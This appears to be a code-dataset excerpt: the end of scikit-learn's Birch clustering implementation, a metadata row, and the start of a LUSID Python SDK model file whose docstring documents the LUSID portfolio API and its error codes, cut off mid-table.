self.n_samples_ = 1
self.centroid_ = self.linear_sum_ = linear_sum
self.squared_sum_ = self.sq_norm_ = np.dot(
self.linear_sum_, self.linear_sum_)
self.child_ = None
def update(self, subcluster):
self.n_samples_ += subcluster.n_samples_
self.linear_sum_ += subcluster.linear_sum_
self.squared_sum_ += subcluster.squared_sum_
self.centroid_ = self.linear_sum_ / self.n_samples_
self.sq_norm_ = np.dot(self.centroid_, self.centroid_)
def merge_subcluster(self, nominee_cluster, threshold):
"""Check if a cluster is worthy enough to be merged. If
yes then merge.
"""
new_ss = self.squared_sum_ + nominee_cluster.squared_sum_
new_ls = self.linear_sum_ + nominee_cluster.linear_sum_
new_n = self.n_samples_ + nominee_cluster.n_samples_
new_centroid = (1 / new_n) * new_ls
new_sq_norm = np.dot(new_centroid, new_centroid)
# The squared radius of the cluster is defined:
# r^2 = sum_i ||x_i - c||^2 / n
# with x_i the n points assigned to the cluster and c its centroid:
# c = sum_i x_i / n
# This can be expanded to:
# r^2 = sum_i ||x_i||^2 / n - 2 < sum_i x_i / n, c> + n ||c||^2 / n
# and therefore simplifies to:
# r^2 = sum_i ||x_i||^2 / n - ||c||^2
sq_radius = new_ss / new_n - new_sq_norm
if sq_radius <= threshold ** 2:
(self.n_samples_, self.linear_sum_, self.squared_sum_,
self.centroid_, self.sq_norm_) = \
new_n, new_ls, new_ss, new_centroid, new_sq_norm
return True
return False
@property
def radius(self):
"""Return radius of the subcluster"""
# Because of numerical issues, this could become negative
sq_radius = self.squared_sum_ / self.n_samples_ - self.sq_norm_
return sqrt(max(0, sq_radius))
class Birch(ClusterMixin, TransformerMixin, BaseEstimator):
"""Implements the Birch clustering algorithm.
It is a memory-efficient, online-learning algorithm provided as an
alternative to :class:`MiniBatchKMeans`. It constructs a tree
data structure with the cluster centroids being read off the leaf.
These can be either the final cluster centroids or can be provided as input
to another clustering algorithm such as :class:`AgglomerativeClustering`.
Read more in the :ref:`User Guide <birch>`.
.. versionadded:: 0.16
Parameters
----------
threshold : float, default=0.5
The radius of the subcluster obtained by merging a new sample and the
closest subcluster should be lesser than the threshold. Otherwise a new
subcluster is started. Setting this value to be very low promotes
splitting and vice-versa.
branching_factor : int, default=50
Maximum number of CF subclusters in each node. If a new samples enters
such that the number of subclusters exceed the branching_factor then
that node is split into two nodes with the subclusters redistributed
in each. The parent subcluster of that node is removed and two new
subclusters are added as parents of the 2 split nodes.
n_clusters : int, instance of sklearn.cluster model, default=3
Number of clusters after the final clustering step, which treats the
subclusters from the leaves as new samples.
- `None` : the final clustering step is not performed and the
subclusters are returned as they are.
- :mod:`sklearn.cluster` Estimator : If a model is provided, the model
is fit treating the subclusters as new samples and the initial data
is mapped to the label of the closest subcluster.
- `int` : the model fit is :class:`AgglomerativeClustering` with
`n_clusters` set to be equal to the int.
compute_labels : bool, default=True
Whether or not to compute labels for each fit.
copy : bool, default=True
Whether or not to make a copy of the given data. If set to False,
the initial data will be overwritten.
Attributes
----------
root_ : _CFNode
Root of the CFTree.
dummy_leaf_ : _CFNode
Start pointer to all the leaves.
subcluster_centers_ : ndarray
Centroids of all subclusters read directly from the leaves.
subcluster_labels_ : ndarray
Labels assigned to the centroids of the subclusters after
they are clustered globally.
labels_ : ndarray of shape (n_samples,)
Array of labels assigned to the input data.
if partial_fit is used instead of fit, they are assigned to the
last batch of data.
See Also
--------
MiniBatchKMeans : Alternative implementation that does incremental updates
of the centers' positions using mini-batches.
Notes
-----
The tree data structure consists of nodes with each node consisting of
a number of subclusters. The maximum number of subclusters in a node
is determined by the branching factor. Each subcluster maintains a
linear sum, squared sum and the number of samples in that subcluster.
In addition, each subcluster can also have a node as its child, if the
subcluster is not a member of a leaf node.
For a new point entering the root, it is merged with the subcluster closest
to it and the linear sum, squared sum and the number of samples of that
subcluster are updated. This is done recursively till the properties of
the leaf node are updated.
References
----------
* Tian Zhang, Raghu Ramakrishnan, Maron Livny
BIRCH: An efficient data clustering method for large databases.
https://www.cs.sfu.ca/CourseCentral/459/han/papers/zhang96.pdf
* Roberto Perdisci
JBirch - Java implementation of BIRCH clustering algorithm
https://code.google.com/archive/p/jbirch
Examples
--------
>>> from sklearn.cluster import Birch
>>> X = [[0, 1], [0.3, 1], [-0.3, 1], [0, -1], [0.3, -1], [-0.3, -1]]
>>> brc = Birch(n_clusters=None)
>>> brc.fit(X)
Birch(n_clusters=None)
>>> brc.predict(X)
array([0, 0, 0, 1, 1, 1])
"""
@_deprecate_positional_args
def __init__(self, *, threshold=0.5, branching_factor=50, n_clusters=3,
compute_labels=True, copy=True):
self.threshold = threshold
self.branching_factor = branching_factor
self.n_clusters = n_clusters
self.compute_labels = compute_labels
self.copy = copy
# TODO: Remove in 1.2
# mypy error: Decorated property not supported
@deprecated( # type: ignore
"fit_ is deprecated in 1.0 and will be removed in 1.2"
)
@property
def fit_(self):
return self._deprecated_fit
# TODO: Remove in 1.2
# mypy error: Decorated property not supported
@deprecated( # type: ignore
"partial_fit_ is deprecated in 1.0 and will be removed in 1.2"
)
@property
def partial_fit_(self):
return self._deprecated_partial_fit
def fit(self, X, y=None):
"""
Build a CF Tree for the input data.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Input data.
y : Ignored
Not used, present here for API consistency by convention.
Returns
-------
self
Fitted estimator.
"""
# TODO: Remove deprected flags in 1.2
self._deprecated_fit, self._deprecated_partial_fit = True, False
return self._fit(X, partial=False)
def _fit(self, X, partial):
has_root = getattr(self, 'root_', None)
first_call = not (partial and has_root)
X = self._validate_data(X, accept_sparse='csr', copy=self.copy,
reset=first_call)
threshold = self.threshold
branching_factor = self.branching_factor
if branching_factor <= 1:
raise ValueError("Branching_factor should be greater than one.")
n_samples, n_features = X.shape
# If partial_fit is called for the first time or fit is called, we
# start a new tree.
if first_call:
# The first root is the leaf. Manipulate this object throughout.
self.root_ = _CFNode(threshold=threshold,
branching_factor=branching_factor,
is_leaf=True,
n_features=n_features)
# To enable getting back subclusters.
self.dummy_leaf_ = _CFNode(threshold=threshold,
branching_factor=branching_factor,
is_leaf=True, n_features=n_features)
self.dummy_leaf_.next_leaf_ = self.root_
self.root_.prev_leaf_ = self.dummy_leaf_
# Cannot vectorize. Enough to convince to use cython.
if not sparse.issparse(X):
iter_func = iter
else:
iter_func = _iterate_sparse_X
for sample in iter_func(X):
subcluster = _CFSubcluster(linear_sum=sample)
split = self.root_.insert_cf_subcluster(subcluster)
if split:
new_subcluster1, new_subcluster2 = _split_node(
self.root_, threshold, branching_factor)
del self.root_
self.root_ = _CFNode(threshold=threshold,
branching_factor=branching_factor,
is_leaf=False,
n_features=n_features)
self.root_.append_subcluster(new_subcluster1)
self.root_.append_subcluster(new_subcluster2)
centroids = np.concatenate([
leaf.centroids_ for leaf in self._get_leaves()])
self.subcluster_centers_ = centroids
self._global_clustering(X)
return self
def _get_leaves(self):
"""
Retrieve the leaves of the CF Node.
Returns
-------
leaves : list of shape (n_leaves,)
List of the leaf nodes.
"""
leaf_ptr = self.dummy_leaf_.next_leaf_
leaves = []
while leaf_ptr is not None:
leaves.append(leaf_ptr)
leaf_ptr = leaf_ptr.next_leaf_
return leaves
def partial_fit(self, X=None, y=None):
"""
Online learning. Prevents rebuilding of CFTree from scratch.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features), \
default=None
Input data. If X is not provided, only the global clustering
step is done.
y : Ignored
Not used, present here for API consistency by convention.
Returns
-------
self
Fitted estimator.
"""
# TODO: Remove deprected flags in 1.2
self._deprecated_partial_fit, self._deprecated_fit = True, False
if X is None:
# Perform just the final global clustering step.
self._global_clustering()
return self
else:
return self._fit(X, partial=True)
def _check_fit(self, X):
check_is_fitted(self)
if (hasattr(self, 'subcluster_centers_') and
X.shape[1] != self.subcluster_centers_.shape[1]):
raise ValueError(
"Training data and predicted data do "
"not have same number of features.")
def predict(self, X):
"""
Predict data using the ``centroids_`` of subclusters.
Avoid computation of the row norms of X.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Input data.
Returns
-------
labels : ndarray of shape(n_samples,)
Labelled data.
"""
check_is_fitted(self)
X = self._validate_data(X, accept_sparse='csr', reset=False)
kwargs = {'Y_norm_squared': self._subcluster_norms}
with config_context(assume_finite=True):
argmin = pairwise_distances_argmin(X, self.subcluster_centers_,
metric_kwargs=kwargs)
return self.subcluster_labels_[argmin]
def transform(self, X):
"""
Transform X into subcluster centroids dimension.
Each dimension represents the distance from the sample point to each
cluster centroid.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Input data.
Returns
-------
X_trans : {array-like, sparse matrix} of shape (n_samples, n_clusters)
Transformed data.
"""
check_is_fitted(self)
self._validate_data(X, accept_sparse='csr', reset=False)
with config_context(assume_finite=True):
return euclidean_distances(X, self.subcluster_centers_)
def _global_clustering(self, X=None):
"""
Global clustering for the subclusters obtained after fitting
"""
clusterer = self.n_clusters
centroids = self.subcluster_centers_
compute_labels = (X is not None) and self.compute_labels
# Preprocessing for the global clustering.
not_enough_centroids = False
if isinstance(clusterer, numbers.Integral):
clusterer = AgglomerativeClustering(
n_clusters=self.n_clusters)
# There is no need to perform the global clustering step.
if len(centroids) < self.n_clusters:
not_enough_centroids = True
elif (clusterer is not None and not
hasattr(clusterer, 'fit_predict')):
raise ValueError("n_clusters should be an instance of "
"ClusterMixin or an int")
# To use in predict to avoid recalculation.
self._subcluster_norms = row_norms(
self.subcluster_centers_, squared=True)
if clusterer is None or not_enough_centroids:
self.subcluster_labels_ = np.arange(len(centroids))
if not_enough_centroids:
warnings.warn(
"Number of subclusters found (%d) by Birch is less "
"than (%d). Decrease the threshold."
% (len(centroids), self.n_clusters), ConvergenceWarning)
else:
# The global clustering step that clusters the subclusters of
# the leaves. It assumes the centroids of the subclusters as
# samples and finds the final centroids.
self.subcluster_labels_ = clusterer.fit_predict(
self.subcluster_centers_)
if compute_labels:
self.labels_ = self.predict(X)
| 37.089985 | 79 | 0.632401 |
795c7db5b9a1153261e66af17f6ae5f314a512e7 | 33,456 | py | Python | sdk/lusid/models/update_property_definition_request.py | fossabot/lusid-sdk-python-preview | 2c95d870489d93dee921593877256d3869c090e6 | [
"MIT"
] | null | null | null | sdk/lusid/models/update_property_definition_request.py | fossabot/lusid-sdk-python-preview | 2c95d870489d93dee921593877256d3869c090e6 | [
"MIT"
] | null | null | null | sdk/lusid/models/update_property_definition_request.py | fossabot/lusid-sdk-python-preview | 2c95d870489d93dee921593877256d3869c090e6 | [
"MIT"
] | 1 | 2020-10-29T08:35:32.000Z | 2020-10-29T08:35:32.000Z | # coding: utf-8
"""
LUSID API
# Introduction This page documents the [LUSID APIs](https://www.lusid.com/api/swagger), which allows authorised clients to query and update their data within the LUSID platform. SDKs to interact with the LUSID APIs are available in the following languages : * [C#](https://github.com/finbourne/lusid-sdk-csharp) * [Java](https://github.com/finbourne/lusid-sdk-java) * [JavaScript](https://github.com/finbourne/lusid-sdk-js) * [Python](https://github.com/finbourne/lusid-sdk-python) # Data Model The LUSID API has a relatively lightweight but extremely powerful data model. One of the goals of LUSID was not to enforce on clients a single rigid data model but rather to provide a flexible foundation onto which clients can map their own data models. The core entities in LUSID provide a minimal structure and set of relationships, and the data model can be extended using Properties. The LUSID data model is exposed through the LUSID APIs. The APIs provide access to both business objects and the meta data used to configure the systems behaviours. The key business entities are: - * **Portfolios** A portfolio is a container for transactions and holdings (a **Transaction Portfolio**) or constituents (a **Reference Portfolio**). * **Derived Portfolios**. Derived Portfolios allow Portfolios to be created based on other Portfolios, by overriding or adding specific items. * **Holdings** A Holding is a quantity of an Instrument or a balance of cash within a Portfolio. Holdings can only be adjusted via Transactions. * **Transactions** A Transaction is an economic event that occurs in a Portfolio, causing its holdings to change. * **Corporate Actions** A corporate action is a market event which occurs to an Instrument and thus applies to all portfolios which holding the instrument. Examples are stock splits or mergers. * **Constituents** A constituent is a record in a Reference Portfolio containing an Instrument and an associated weight. * **Instruments** An instrument represents a currency, tradable instrument or OTC contract that is attached to a transaction and a holding. * **Properties** All major entities allow additional user defined properties to be associated with them. For example, a Portfolio manager may be associated with a portfolio. Meta data includes: - * **Transaction Types** Transactions are booked with a specific transaction type. The types are client defined and are used to map the Transaction to a series of movements which update the portfolio holdings. * **Properties Types** Types of user defined properties used within the system. ## Scope All data in LUSID is segregated at the client level. Entities in LUSID are identifiable by a unique code. Every entity lives within a logical data partition known as a Scope. Scope is an identity namespace allowing two entities with the same unique code to co-exist within individual address spaces. For example, prices for equities from different vendors may be uploaded into different scopes such as `client/vendor1` and `client/vendor2`. A portfolio may then be valued using either of the price sources by referencing the appropriate scope. LUSID Clients cannot access scopes of other clients. ## Instruments LUSID has its own built-in instrument master which you can use to master your own instrument universe. Every instrument must be created with one or more unique market identifiers, such as [FIGI](https://openfigi.com/). For any non-listed instruments (eg OTCs), you can upload an instrument against a custom ID of your choosing. In addition, LUSID will allocate each instrument a unique 'LUSID instrument identifier'. The LUSID instrument identifier is what is used when uploading transactions, holdings, prices, etc. The API exposes an `instrument/lookup` endpoint which can be used to lookup these LUSID identifiers using their market identifiers. Cash can be referenced using the ISO currency code prefixed with \"`CCY_`\" e.g. `CCY_GBP` ## Instrument Data Instrument data can be uploaded to the system using the [Instrument Properties](#tag/InstrumentProperties) endpoint. | Field|Type|Description | | ---|---|--- | | Key|propertykey|The key of the property. This takes the format {domain}/{scope}/{code} e.g. 'Instrument/system/Name' or 'Transaction/strategy/quantsignal'. | | Value|string|The value of the property. | | EffectiveFrom|datetimeoffset|The effective datetime from which the property is valid. | ## Transaction Portfolios Portfolios are the top-level entity containers within LUSID, containing transactions, corporate actions and holdings. The transactions build up the portfolio holdings on which valuations, analytics profit & loss and risk can be calculated. Properties can be associated with Portfolios to add in additional data. Portfolio properties can be changed over time, for example to allow a Portfolio Manager to be linked with a Portfolio. Additionally, portfolios can be securitised and held by other portfolios, allowing LUSID to perform \"drill-through\" into underlying fund holdings ### Derived Portfolios LUSID also allows for a portfolio to be composed of another portfolio via derived portfolios. A derived portfolio can contain its own transactions and also inherits any transactions from its parent portfolio. Any changes made to the parent portfolio are automatically reflected in derived portfolio. Derived portfolios in conjunction with scopes are a powerful construct. For example, to do pre-trade what-if analysis, a derived portfolio could be created a new namespace linked to the underlying live (parent) portfolio. Analysis can then be undertaken on the derived portfolio without affecting the live portfolio. ### Transactions A transaction represents an economic activity against a Portfolio. Transactions are processed according to a configuration. This will tell the LUSID engine how to interpret the transaction and correctly update the holdings. LUSID comes with a set of transaction types you can use out of the box, or you can configure your own set(s) of transactions. For more details see the [LUSID Getting Started Guide for transaction configuration.](https://support.lusid.com/configuring-transaction-types) | Field|Type|Description | | ---|---|--- | | TransactionId|string|The unique identifier for the transaction. | | Type|string|The type of the transaction e.g. 'Buy', 'Sell'. The transaction type should have been pre-configured via the System Configuration API endpoint. If it hasn't been pre-configured the transaction will still be updated or inserted however you will be unable to generate the resultant holdings for the portfolio that contains this transaction as LUSID does not know how to process it. | | InstrumentIdentifiers|map|A set of instrument identifiers to use to resolve the transaction to a unique instrument. | | TransactionDate|dateorcutlabel|The date of the transaction. | | SettlementDate|dateorcutlabel|The settlement date of the transaction. | | Units|decimal|The number of units transacted in the associated instrument. | | TransactionPrice|transactionprice|The price for each unit of the transacted instrument in the transaction currency. | | TotalConsideration|currencyandamount|The total value of the transaction in the settlement currency. | | ExchangeRate|decimal|The exchange rate between the transaction and settlement currency. For example if the transaction currency is in USD and the settlement currency is in GBP this this the USD/GBP rate. | | TransactionCurrency|currency|The transaction currency. | | Properties|map|Set of unique transaction properties and associated values to store with the transaction. Each property must be from the 'Transaction' domain. | | CounterpartyId|string|The identifier for the counterparty of the transaction. | | Source|string|The source of the transaction. This is used to look up the appropriate transaction group set in the transaction type configuration. | From these fields, the following values can be calculated * **Transaction value in Transaction currency**: TotalConsideration / ExchangeRate * **Transaction value in Portfolio currency**: Transaction value in Transaction currency * TradeToPortfolioRate #### Example Transactions ##### A Common Purchase Example Three example transactions are shown in the table below. They represent a purchase of USD denominated IBM shares within a Sterling denominated portfolio. * The first two transactions are for separate buy and fx trades * Buying 500 IBM shares for $71,480.00 * A spot foreign exchange conversion to fund the IBM purchase. (Buy $71,480.00 for £54,846.60) * The third transaction is an alternate version of the above trades. Buying 500 IBM shares and settling directly in Sterling. | Column | Buy Trade | Fx Trade | Buy Trade with foreign Settlement | | ----- | ----- | ----- | ----- | | TransactionId | FBN00001 | FBN00002 | FBN00003 | | Type | Buy | FxBuy | Buy | | InstrumentIdentifiers | { \"figi\", \"BBG000BLNNH6\" } | { \"CCY\", \"CCY_USD\" } | { \"figi\", \"BBG000BLNNH6\" } | | TransactionDate | 2018-08-02 | 2018-08-02 | 2018-08-02 | | SettlementDate | 2018-08-06 | 2018-08-06 | 2018-08-06 | | Units | 500 | 71480 | 500 | | TransactionPrice | 142.96 | 1 | 142.96 | | TradeCurrency | USD | USD | USD | | ExchangeRate | 1 | 0.7673 | 0.7673 | | TotalConsideration.Amount | 71480.00 | 54846.60 | 54846.60 | | TotalConsideration.Currency | USD | GBP | GBP | | Trade/default/TradeToPortfolioRate* | 0.7673 | 0.7673 | 0.7673 | [* This is a property field] ##### A Forward FX Example LUSID has a flexible transaction modelling system, meaning there are a number of different ways of modelling forward fx trades. The default LUSID transaction types are FwdFxBuy and FwdFxSell. Using these transaction types, LUSID will generate two holdings for each Forward FX trade, one for each currency in the trade. An example Forward Fx trade to sell GBP for USD in a JPY-denominated portfolio is shown below: | Column | Forward 'Sell' Trade | Notes | | ----- | ----- | ---- | | TransactionId | FBN00004 | | | Type | FwdFxSell | | | InstrumentIdentifiers | { \"Instrument/default/Currency\", \"GBP\" } | | | TransactionDate | 2018-08-02 | | | SettlementDate | 2019-02-06 | Six month forward | | Units | 10000.00 | Units of GBP | | TransactionPrice | 1 | | | TradeCurrency | GBP | Currency being sold | | ExchangeRate | 1.3142 | Agreed rate between GBP and USD | | TotalConsideration.Amount | 13142.00 | Amount in the settlement currency, USD | | TotalConsideration.Currency | USD | Settlement currency | | Trade/default/TradeToPortfolioRate | 142.88 | Rate between trade currency, GBP and portfolio base currency, JPY | Please note that exactly the same economic behaviour could be modelled using the FwdFxBuy Transaction Type with the amounts and rates reversed. ### Holdings A holding represents a position in an instrument or cash on a given date. | Field|Type|Description | | ---|---|--- | | InstrumentUid|string|The unqiue Lusid Instrument Id (LUID) of the instrument that the holding is in. | | SubHoldingKeys|map|The sub-holding properties which identify the holding. Each property will be from the 'Transaction' domain. These are configured when a transaction portfolio is created. | | Properties|map|The properties which have been requested to be decorated onto the holding. These will be from the 'Instrument' or 'Holding' domain. | | HoldingType|string|The type of the holding e.g. Position, Balance, CashCommitment, Receivable, ForwardFX etc. | | Units|decimal|The total number of units of the holding. | | SettledUnits|decimal|The total number of settled units of the holding. | | Cost|currencyandamount|The total cost of the holding in the transaction currency. | | CostPortfolioCcy|currencyandamount|The total cost of the holding in the portfolio currency. | | Transaction|transaction|The transaction associated with an unsettled holding. | ## Corporate Actions Corporate actions are represented within LUSID in terms of a set of instrument-specific 'transitions'. These transitions are used to specify the participants of the corporate action, and the effect that the corporate action will have on holdings in those participants. ### Corporate Action | Field|Type|Description | | ---|---|--- | | CorporateActionCode|code|The unique identifier of this corporate action | | Description|string| | | AnnouncementDate|datetimeoffset|The announcement date of the corporate action | | ExDate|datetimeoffset|The ex date of the corporate action | | RecordDate|datetimeoffset|The record date of the corporate action | | PaymentDate|datetimeoffset|The payment date of the corporate action | | Transitions|corporateactiontransition[]|The transitions that result from this corporate action | ### Transition | Field|Type|Description | | ---|---|--- | | InputTransition|corporateactiontransitioncomponent|Indicating the basis of the corporate action - which security and how many units | | OutputTransitions|corporateactiontransitioncomponent[]|What will be generated relative to the input transition | ### Example Corporate Action Transitions #### A Dividend Action Transition In this example, for each share of IBM, 0.20 units (or 20 pence) of GBP are generated. | Column | Input Transition | Output Transition | | ----- | ----- | ----- | | Instrument Identifiers | { \"figi\" : \"BBG000BLNNH6\" } | { \"ccy\" : \"CCY_GBP\" } | | Units Factor | 1 | 0.20 | | Cost Factor | 1 | 0 | #### A Split Action Transition In this example, for each share of IBM, we end up with 2 units (2 shares) of IBM, with total value unchanged. | Column | Input Transition | Output Transition | | ----- | ----- | ----- | | Instrument Identifiers | { \"figi\" : \"BBG000BLNNH6\" } | { \"figi\" : \"BBG000BLNNH6\" } | | Units Factor | 1 | 2 | | Cost Factor | 1 | 1 | #### A Spinoff Action Transition In this example, for each share of IBM, we end up with 1 unit (1 share) of IBM and 3 units (3 shares) of Celestica, with 85% of the value remaining on the IBM share, and 5% in each Celestica share (15% total). | Column | Input Transition | Output Transition 1 | Output Transition 2 | | ----- | ----- | ----- | ----- | | Instrument Identifiers | { \"figi\" : \"BBG000BLNNH6\" } | { \"figi\" : \"BBG000BLNNH6\" } | { \"figi\" : \"BBG000HBGRF3\" } | | Units Factor | 1 | 1 | 3 | | Cost Factor | 1 | 0.85 | 0.15 | ## Reference Portfolios Reference portfolios are portfolios that contain constituents with weights. They are designed to represent entities such as indices and benchmarks. ### Constituents | Field|Type|Description | | ---|---|--- | | InstrumentIdentifiers|map|Unique instrument identifiers | | InstrumentUid|string|LUSID's internal unique instrument identifier, resolved from the instrument identifiers | | Currency|decimal| | | Weight|decimal| | | FloatingWeight|decimal| | ## Portfolio Groups Portfolio groups allow the construction of a hierarchy from portfolios and groups. Portfolio operations on the group are executed on an aggregated set of portfolios in the hierarchy. For example: * Global Portfolios _(group)_ * APAC _(group)_ * Hong Kong _(portfolio)_ * Japan _(portfolio)_ * Europe _(group)_ * France _(portfolio)_ * Germany _(portfolio)_ * UK _(portfolio)_ In this example **Global Portfolios** is a group that consists of an aggregate of **Hong Kong**, **Japan**, **France**, **Germany** and **UK** portfolios. ## Properties Properties are key-value pairs that can be applied to any entity within a domain (where a domain is `trade`, `portfolio`, `security` etc). Properties must be defined before use with a `PropertyDefinition` and can then subsequently be added to entities. ## Schema A detailed description of the entities used by the API and parameters for endpoints which take a JSON document can be retrieved via the `schema` endpoint. ## Meta data The following headers are returned on all responses from LUSID | Name | Purpose | | --- | --- | | lusid-meta-duration | Duration of the request | | lusid-meta-success | Whether or not LUSID considered the request to be successful | | lusid-meta-requestId | The unique identifier for the request | | lusid-schema-url | Url of the schema for the data being returned | | lusid-property-schema-url | Url of the schema for any properties | # Error Codes | Code|Name|Description | | ---|---|--- | | <a name=\"-10\">-10</a>|Server Configuration Error| | | <a name=\"-1\">-1</a>|Unknown error|An unexpected error was encountered on our side. | | <a name=\"102\">102</a>|Version Not Found| | | <a name=\"103\">103</a>|Api Rate Limit Violation| | | <a name=\"104\">104</a>|Instrument Not Found| | | <a name=\"105\">105</a>|Property Not Found| | | <a name=\"106\">106</a>|Portfolio Recursion Depth| | | <a name=\"108\">108</a>|Group Not Found| | | <a name=\"109\">109</a>|Portfolio Not Found| | | <a name=\"110\">110</a>|Property Schema Not Found| | | <a name=\"111\">111</a>|Portfolio Ancestry Not Found| | | <a name=\"112\">112</a>|Portfolio With Id Already Exists| | | <a name=\"113\">113</a>|Orphaned Portfolio| | | <a name=\"119\">119</a>|Missing Base Claims| | | <a name=\"121\">121</a>|Property Not Defined| | | <a name=\"122\">122</a>|Cannot Delete System Property| | | <a name=\"123\">123</a>|Cannot Modify Immutable Property Field| | | <a name=\"124\">124</a>|Property Already Exists| | | <a name=\"125\">125</a>|Invalid Property Life Time| | | <a name=\"126\">126</a>|Property Constraint Style Excludes Properties| | | <a name=\"127\">127</a>|Cannot Modify Default Data Type| | | <a name=\"128\">128</a>|Group Already Exists| | | <a name=\"129\">129</a>|No Such Data Type| | | <a name=\"130\">130</a>|Undefined Value For Data Type| | | <a name=\"131\">131</a>|Unsupported Value Type Defined On Data Type| | | <a name=\"132\">132</a>|Validation Error| | | <a name=\"133\">133</a>|Loop Detected In Group Hierarchy| | | <a name=\"134\">134</a>|Undefined Acceptable Values| | | <a name=\"135\">135</a>|Sub Group Already Exists| | | <a name=\"138\">138</a>|Price Source Not Found| | | <a name=\"139\">139</a>|Analytic Store Not Found| | | <a name=\"141\">141</a>|Analytic Store Already Exists| | | <a name=\"143\">143</a>|Client Instrument Already Exists| | | <a name=\"144\">144</a>|Duplicate In Parameter Set| | | <a name=\"147\">147</a>|Results Not Found| | | <a name=\"148\">148</a>|Order Field Not In Result Set| | | <a name=\"149\">149</a>|Operation Failed| | | <a name=\"150\">150</a>|Elastic Search Error| | | <a name=\"151\">151</a>|Invalid Parameter Value| | | <a name=\"153\">153</a>|Command Processing Failure| | | <a name=\"154\">154</a>|Entity State Construction Failure| | | <a name=\"155\">155</a>|Entity Timeline Does Not Exist| | | <a name=\"156\">156</a>|Concurrency Conflict Failure| | | <a name=\"157\">157</a>|Invalid Request| | | <a name=\"158\">158</a>|Event Publish Unknown| | | <a name=\"159\">159</a>|Event Query Failure| | | <a name=\"160\">160</a>|Blob Did Not Exist| | | <a name=\"162\">162</a>|Sub System Request Failure| | | <a name=\"163\">163</a>|Sub System Configuration Failure| | | <a name=\"165\">165</a>|Failed To Delete| | | <a name=\"166\">166</a>|Upsert Client Instrument Failure| | | <a name=\"167\">167</a>|Illegal As At Interval| | | <a name=\"168\">168</a>|Illegal Bitemporal Query| | | <a name=\"169\">169</a>|Invalid Alternate Id| | | <a name=\"170\">170</a>|Cannot Add Source Portfolio Property Explicitly| | | <a name=\"171\">171</a>|Entity Already Exists In Group| | | <a name=\"173\">173</a>|Entity With Id Already Exists| | | <a name=\"174\">174</a>|Derived Portfolio Details Do Not Exist| | | <a name=\"176\">176</a>|Portfolio With Name Already Exists| | | <a name=\"177\">177</a>|Invalid Transactions| | | <a name=\"178\">178</a>|Reference Portfolio Not Found| | | <a name=\"179\">179</a>|Duplicate Id| | | <a name=\"180\">180</a>|Command Retrieval Failure| | | <a name=\"181\">181</a>|Data Filter Application Failure| | | <a name=\"182\">182</a>|Search Failed| | | <a name=\"183\">183</a>|Movements Engine Configuration Key Failure| | | <a name=\"184\">184</a>|Fx Rate Source Not Found| | | <a name=\"185\">185</a>|Accrual Source Not Found| | | <a name=\"186\">186</a>|Access Denied| | | <a name=\"187\">187</a>|Invalid Identity Token| | | <a name=\"188\">188</a>|Invalid Request Headers| | | <a name=\"189\">189</a>|Price Not Found| | | <a name=\"190\">190</a>|Invalid Sub Holding Keys Provided| | | <a name=\"191\">191</a>|Duplicate Sub Holding Keys Provided| | | <a name=\"192\">192</a>|Cut Definition Not Found| | | <a name=\"193\">193</a>|Cut Definition Invalid| | | <a name=\"194\">194</a>|Time Variant Property Deletion Date Unspecified| | | <a name=\"195\">195</a>|Perpetual Property Deletion Date Specified| | | <a name=\"196\">196</a>|Time Variant Property Upsert Date Unspecified| | | <a name=\"197\">197</a>|Perpetual Property Upsert Date Specified| | | <a name=\"200\">200</a>|Invalid Unit For Data Type| | | <a name=\"201\">201</a>|Invalid Type For Data Type| | | <a name=\"202\">202</a>|Invalid Value For Data Type| | | <a name=\"203\">203</a>|Unit Not Defined For Data Type| | | <a name=\"204\">204</a>|Units Not Supported On Data Type| | | <a name=\"205\">205</a>|Cannot Specify Units On Data Type| | | <a name=\"206\">206</a>|Unit Schema Inconsistent With Data Type| | | <a name=\"207\">207</a>|Unit Definition Not Specified| | | <a name=\"208\">208</a>|Duplicate Unit Definitions Specified| | | <a name=\"209\">209</a>|Invalid Units Definition| | | <a name=\"210\">210</a>|Invalid Instrument Identifier Unit| | | <a name=\"211\">211</a>|Holdings Adjustment Does Not Exist| | | <a name=\"212\">212</a>|Could Not Build Excel Url| | | <a name=\"213\">213</a>|Could Not Get Excel Version| | | <a name=\"214\">214</a>|Instrument By Code Not Found| | | <a name=\"215\">215</a>|Entity Schema Does Not Exist| | | <a name=\"216\">216</a>|Feature Not Supported On Portfolio Type| | | <a name=\"217\">217</a>|Quote Not Found| | | <a name=\"218\">218</a>|Invalid Quote Identifier| | | <a name=\"219\">219</a>|Invalid Metric For Data Type| | | <a name=\"220\">220</a>|Invalid Instrument Definition| | | <a name=\"221\">221</a>|Instrument Upsert Failure| | | <a name=\"222\">222</a>|Reference Portfolio Request Not Supported| | | <a name=\"223\">223</a>|Transaction Portfolio Request Not Supported| | | <a name=\"224\">224</a>|Invalid Property Value Assignment| | | <a name=\"230\">230</a>|Transaction Type Not Found| | | <a name=\"231\">231</a>|Transaction Type Duplication| | | <a name=\"232\">232</a>|Portfolio Does Not Exist At Given Date| | | <a name=\"233\">233</a>|Query Parser Failure| | | <a name=\"234\">234</a>|Duplicate Constituent| | | <a name=\"235\">235</a>|Unresolved Instrument Constituent| | | <a name=\"236\">236</a>|Unresolved Instrument In Transition| | | <a name=\"237\">237</a>|Missing Side Definitions| | | <a name=\"299\">299</a>|Invalid Recipe| | | <a name=\"300\">300</a>|Missing Recipe| | | <a name=\"301\">301</a>|Dependencies| | | <a name=\"304\">304</a>|Portfolio Preprocess Failure| | | <a name=\"310\">310</a>|Valuation Engine Failure| | | <a name=\"311\">311</a>|Task Factory Failure| | | <a name=\"312\">312</a>|Task Evaluation Failure| | | <a name=\"313\">313</a>|Task Generation Failure| | | <a name=\"314\">314</a>|Engine Configuration Failure| | | <a name=\"315\">315</a>|Model Specification Failure| | | <a name=\"320\">320</a>|Market Data Key Failure| | | <a name=\"321\">321</a>|Market Resolver Failure| | | <a name=\"322\">322</a>|Market Data Failure| | | <a name=\"330\">330</a>|Curve Failure| | | <a name=\"331\">331</a>|Volatility Surface Failure| | | <a name=\"332\">332</a>|Volatility Cube Failure| | | <a name=\"350\">350</a>|Instrument Failure| | | <a name=\"351\">351</a>|Cash Flows Failure| | | <a name=\"352\">352</a>|Reference Data Failure| | | <a name=\"360\">360</a>|Aggregation Failure| | | <a name=\"361\">361</a>|Aggregation Measure 